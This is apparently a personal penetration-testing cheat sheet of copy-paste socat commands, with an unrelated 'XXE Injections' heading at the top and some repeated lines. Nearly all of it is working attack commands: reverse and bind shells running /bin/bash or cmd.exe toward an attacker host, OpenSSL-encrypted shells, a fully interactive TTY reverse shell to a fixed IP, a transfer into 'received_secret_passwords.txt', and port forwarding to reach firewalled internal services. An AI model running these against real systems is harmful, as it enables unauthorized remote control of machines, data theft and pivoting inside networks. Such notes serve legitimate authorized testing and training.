XXE Injections
Abusing XML Parsers
I used socat heavily during pwk as it’s a powerful tool. In addition to the functionalities of netcat, with socat you can setup encrypted reverse/bind shells.
While all of this information is available in the help/manpages you still have to piece together what you want from the information provided in the documentation.
I like to approach things from a conceptual standpoint. So rather than play with syntax or reread documentation until it’s memorized, I like to prepare the commands I use most with a tool ahead of time and copy/paste them in a terminal.
This is particularly useful when time is of the essence or just for building a PoC in general.
-d
fork
verfiy=0
pipes
TCP4:<rhost>:<rport>
TCP4-LISTEN:<port>
EXEC:/bin/bash
EXEC:cmd.exe,pipes
EXEC:bash,pipes
socat - TCP4:<remote server ip address>:portnumber`
As a side note, socat requires - to transfer data between STDIO and the remote host (i.e keyboard interaction)
socat TCP4-LISTEN:<portnum> STDOUT
Root is required to bind a port below 1024.
socat TCP4-LISTEN:<portnum> STDOUT
Root is required to bind a port below 1024.
socat TCP4:<remote ip>:<remote port> file:received_secret_passwords.txt,create`
Root is required to bind a port below 1024.
socat TCP4:<rhost>:rport EXEC:/bin/bash
socat TCP4:<rhost>:rport EXEC:cmd.exe,pipes
socat TCP4:<rhost>:rport EXEC:bash,pipes
See ssl certificates certificates for creating a .pem file. target:
sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash
attacker:
socat - OPENSSL:<remote ip>:443,verify=0
See ssl certificates certificates for creating a .pem file. target:
socat OPENSSL:<remote ip>:<remote port>,verify=0 EXEC:/bin/bash
attacker:
socat -d -d OPENSSL-LISTEN:<remote port>,cert=bind.pem,verify=0,fork STDOUT
Listening Side:
socat file:`tty`,raw,echo=0 tcp-listen:4444
Target Side:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
This is most useful for exposing a service running on local host for example.
your machine:
socat -v TCP4:10000 TCP4-LISTEN:8000
target machine:
socat TCP4:<my ip>:10000 TCP4:<internal webserver>:<internal webserver port>
On a target we listen on port 12080 and forward traffic to port 8080, which presumably is behind a firewall or otherwise unreachable. So now from our attack box we can send to traffic to port 8080 via port 12080.
socat TCP-LISTEN:12080,reuseaddr,fork TCP:0.0.0.0:8080 &